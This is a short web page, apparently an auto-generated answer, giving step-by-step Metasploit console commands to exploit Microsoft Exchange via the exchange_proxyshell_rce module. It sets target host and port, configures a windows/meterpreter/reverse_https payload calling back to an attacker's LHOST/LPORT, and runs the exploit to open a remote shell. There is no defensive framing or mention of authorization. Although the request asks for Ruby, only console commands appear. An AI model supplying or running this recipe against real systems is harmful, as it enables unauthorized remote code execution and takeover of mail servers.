open a new meterpreter session using the exchange_proxyshell_rce exploit in ruby

To open a new meterpreter session using the exchange_proxyshell_rce exploit in ruby, follow these steps:

  1. First, setup the Metasploit framework on your system and run it.

  2. Next, load the exploit/multi/http/exchange_proxyshell_rce module by running the following command in the Metasploit console:

    msf6 > use exploit/multi/http/exchange_proxyshell_rce
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  3. Set the values of RHOST, RPORT and TARGETURI options as per the target environment. For example:

    msf6 exploit(multi/http/exchange_proxyshell_rce) > set RHOST <target_ip>
    msf6 exploit(multi/http/exchange_proxyshell_rce) > set RPORT <target_port>
    msf6 exploit(multi/http/exchange_proxyshell_rce) > set TARGETURI /owa/auth/x.js
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  4. Set the PAYLOAD option to windows/meterpreter/reverse_https, as this payload will create a new meterpreter session for us:

    msf6 exploit(multi/http/exchange_proxyshell_rce) > set PAYLOAD windows/meterpreter/reverse_https
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  5. Configure the payload options such as LHOST and LPORT to connect back to your attacker machine:

    msf6 exploit(multi/http/exchange_proxyshell_rce) > set LHOST <attacker_ip>
    msf6 exploit(multi/http/exchange_proxyshell_rce) > set LPORT <attacker_port>
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  6. Finally, run the exploit using the exploit command:

    msf6 exploit(multi/http/exchange_proxyshell_rce) > exploit
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If the exploit is successful, you should see a new meterpreter session opened in your Metasploit console.

gistlibby LogSnag